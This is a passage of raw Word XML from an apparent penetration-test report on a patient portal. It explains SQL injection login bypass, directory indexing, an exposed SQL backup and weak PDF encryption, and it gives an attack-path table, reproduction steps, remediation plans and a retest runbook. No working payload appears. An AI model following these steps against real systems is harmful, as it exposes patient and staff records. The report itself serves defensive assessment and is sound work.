      <w:r>
        <w:rPr/>
        <w:t>This section explains the observed weaknesses in plain technical language before the report returns to the exploitation narrative. It is included so a reviewer who is not yet experienced with web application security can understand why each response is significant and how the individual controls are supposed to work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6.1 What an HTTP authentication boundary should do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A login endpoint normally receives a username and password, verifies those values against a trusted identity store, and creates an authenticated session only when the verification succeeds. The security invariant is simple: an invalid credential set must never produce the same authenticated state as a valid credential set. In this assessment, the baseline request and the controlled SQL input produced materially different states even though the supplied password remained invalid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6.2 Why the baseline matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A professional exploit record begins with a baseline because a single response can otherwise be misinterpreted. Here, the baseline returned HTTP 200, 2,281 bytes and no redirect. The exploit request returned HTTP 302 and a Location header pointing to portal.php. The controlled variable was the username field. This makes the state transition attributable to the input change rather than to a generic portal redirect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6.3 Conceptual SQL injection model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following is an illustrative model, not recovered source code. It shows the class of coding error that can produce the observed behavior:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:start="259" w:end="259"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>SELECT id FROM users WHERE username = '$username' AND password = '$password';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If application code builds a query by concatenating untrusted text, quote characters can terminate a string literal and comment syntax can cause the remainder of a predicate to be ignored. Parameterized queries prevent the database from treating the supplied value as executable SQL syntax. In a secure implementation, the username is data, not part of the SQL program.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6.4 Why the SQL error is a separate finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Verbose SQL errors and SQL injection are related but distinct controls. SQL injection is the ability to alter database query semantics. Error disclosure is the failure to hide internal implementation details from the requester. Even if parameterization is corrected, production error handling should still prevent database-driver messages, stack traces and query fragments from reaching users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6.5 Directory indexing in beginner terms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A normal web server can return a list of files when a directory has no index document and auto-indexing is enabled. That behavior is convenient for public file repositories but dangerous for application directories. The server in this assessment effectively turned internal file names into a menu: the attacker could browse the directory first and then request the interesting file directly. robots.txt does not change this because robots.txt tells crawlers what to avoid; it does not enforce authorization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6.6 Why the backup is more serious than an ordinary file leak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The exposed object was not a harmless image or obsolete public document. It was a structured database backup with table definitions and rows. A structured backup gives an attacker a reusable dataset: records can be searched, aggregated, correlated and copied without additional parsing of a human-readable page. The captured header itself labels the database as confidential, making the deployment contradiction especially clear.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6.7 Application authorization versus document encryption</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The patient-report path demonstrates two different security layers. Application authorization decides whether a user may retrieve a report. PDF encryption protects the file if someone obtains the file without the password. The assessment shows why the first control must be correct even when the second exists: once the application returns the encrypted file, the attacker can work on it offline without further interaction with the application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6.8 What CVSS is and is not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>CVSS is a technical scoring system for communicating severity characteristics such as network reachability, attack complexity, privileges, user interaction and impact. It is not a legal conclusion, a prediction of financial loss or a replacement for business context. Scores marked with an asterisk are retained as provisional values from the assessment where environmental assumptions matter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7. Evidence-to-Finding Traceability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A high-quality penetration test should allow a reviewer to walk backward from a finding to the exact artifact that proves it. The matrix below provides that traceability.</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556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>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Finding</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Primary evidence</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Secondary evidence</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Boundary / limitation</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F-01</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Directory-index screenshots for /old/, /patient/ and /staff/</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HTML and command register</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Directory listing is confirmed; no claim that every listed file is readable</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F-02</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SQL backup artifact and browser evidence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Payroll/shareholder analysis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Exposure is directly confirmed; legal/regulatory consequences are outside scope</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F-03</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Baseline/exploit HTTP differential and Burp response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Browser-confirmed portal access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sqlmap did not independently confirm because of 403/connection instability</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F-04</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Captured SQL syntax warning</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SQLi request/response evidence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Exact unseen source code is not claimed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F-05</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Three HTTP 200 PDF responses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Portal screenshots and download links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Standalone cross-patient IDOR not tested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F-06</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Sequential report identifiers and exposed reports/ path</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403 response for direct reports directory</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arbitrary file-read claim</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F-07</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Directory listing showing error_log metadata</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Related patient directory screenshot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Log contents not claimed readable</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F-08</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HTTP/service fingerprints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Nmap service scan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banner-specific exploit established</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Evidence strength scale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Level</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Meaning</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Use in this report</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E3 — Direct exploit proof</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Controlled input causes a reproducible security-state change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F-03</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E2 — Direct exposure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Unauthenticated request returns sensitive artifact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F-02</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E1 — Corroborating evidence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Screenshots/HTML reinforce a directly observed behavior</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F-01/F-05/F-07</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E0 — Contextual</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Technology or configuration observation without exploit proof</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F-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>8. Attack-Path Graph &amp; Trust Boundaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The compromise can be understood as a sequence of trust-boundary crossings. The attacker begins outside the application and should be stopped at multiple independent boundaries. Instead, several boundaries fail in sequence.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556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>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Boundary</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Expected control</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Observed condition</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Consequence</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Internet → web root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Sensitive files denied</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Directory indexing exposed application artifacts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Enumeration</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Web root → backup data</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Backups outside public root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SQL backup directly downloadable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HR/shareholder disclosure</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User input → SQL engine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Parameterized query</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Controlled input changes authentication behavior</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 bypass</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Session → patient portal</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Valid authenticated session required</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Portal reached after SQLi state change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 function access</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Session → report object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Server-side ownership check</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Three report objects returned</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Patient-report retrieval</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Retrieved PDF → document content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Strong document protection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Legacy PDF protection + weak passwords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Offline recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This model is useful for remediation because it shows why fixing only one symptom may leave another path open. Removing the SQL backup does not fix SQL injection; fixing SQL injection does not remove the exposed backup. The controls must be corrected independently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>9. Bounty-Grade Reproducibility Standard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The project is written to the evidence standard expected from a high-quality vulnerability submission: a reviewer should be able to reproduce the important behavior without trusting an assertion. The standard used here is deliberately stricter than “scanner found it.”</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blHeader w:val="true"/>
        </w:trPr>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Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>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Implementation in this project</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Clear scope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Target hostname and authorization boundary are stated at the front of the report</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Minimal exploit</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The SQLi proof changes one field while holding the password constant</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Baseline comparison</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Normal invalid login is captured before the exploit request</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Impact proof</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Portal access and three PDF responses are preserved</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Independent corroboration</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Burp/browser evidence supplements curl output</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Tool honesty</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sqlmap limitations are recorded instead of being rewritten as confirmation</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Data quantification</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Exposed database records are counted and aggregated</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Evidence integrity</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SHA-256 inventory and organized artifacts are retained</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Remediation verification</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Every major finding has a concrete retest condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>How a reviewer should reproduce the core finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Request the patient login form and confirm the username/password POST fields.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Send the baseline invalid credentials and record HTTP 200/no redirect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Change only the username to the authorized test payload and repeat the request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Confirm the HTTP 302 Location header points to portal.php.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Open the redirected portal and verify the report list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Retrieve the three report objects and compare status, size and content type.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>For the backup path, request the known SQL filename without authentication and verify the file is returned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:ind w:hanging="0" w:start="360"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>10. Attacker Effort vs Defender Effort</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The observed attack chain has low operational friction. The attacker does not need a custom exploit framework, privileged network access or user interaction. Most steps consist of ordinary HTTP requests followed by offline file analysis. This is an important security property: when exploitation is simple, a vulnerability can be abused at scale even if the underlying code defect is small.</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Stage</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Attacker requirement</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Defender control that should stop it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="586"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Discovery</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Web browser/curl</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Disable directory listing and remove sensitive files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="383"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Backup access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Known filename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Keep backups outside public web root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="328"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SQLi</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POST request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Parameterized query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="329"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Portal access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redirect/session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Correct authentication invariant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="339"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Report retrieval</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Known numeric ID</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Record-level authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="382"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recovery</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Offline CPU time + wordlist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Strong document password/modern encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>11. Remediation Engineering — From Patch to Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A professional remediation plan should specify not only what to change but how the change can be verified. The following control sequence turns the findings into an engineering backlog.</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Control</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Implementation task</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Verification artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="586"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Public-file hygiene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Move backups/logs/archives outside document root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Web scan + 403/404 evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="557"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Directory controls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Disable auto-indexing and deny legacy paths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Unauthenticated directory tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="557"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Authentication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Use prepared statements and safe password verification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Regression suite + code review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="438"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Error handling</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Disable database exception display</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Malformed-input response captures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="393"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Object authorization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Check session identity against report owner</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Horizontal authorization test matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="329"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Document protection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Use strong passwords and current encryption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qpdf/security policy check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="382"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Monitoring</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Correlate failed login → portal session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SIEM rule + sample alert</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Deployment pipeline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Fail builds containing .sql/.bak/log artifacts in web root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CI artifact scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>CI/CD prevention ideas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Fail a build if database dumps or backup extensions appear under the web document root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Run a dynamic smoke test against authentication endpoints with quote/comment payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Verify that production error responses contain no database driver names or stack traces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Test that a valid session can access its own report but cannot access another user’s report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Include secret scanning and artifact scanning before deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>12. Retest Runbook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The retest should be performed after remediation in a controlled maintenance window. The objective is not merely to see whether the original payload stops working; the objective is to verify that the underlying security invariant has been restored.</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Step</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Retest action</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Pass condition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R1</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Request /old/, /patient/ and /staff/ anonymously</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directory indexes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="584"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R2</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Request the known SQL backup and common backup names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sensitive content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="383"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R3</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Submit invalid credentials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authenticated session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="383"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R4</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Submit quote/comment/boolean SQLi probes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state change; generic error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="328"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R5</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Inspect response headers and error bodies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DB implementation detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="448"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R6</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Authenticate as a test patient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Portal opens only after valid authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="437"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R7</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Request own report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200 only when authorized</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="394"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R8</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Request another patient’s report ID</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403/404; no content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="492"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R9</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Enumerate sequential IDs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cross-user disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="353"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R10</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Inspect logs/SIEM</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Expected alerts for test activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Retest closure evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
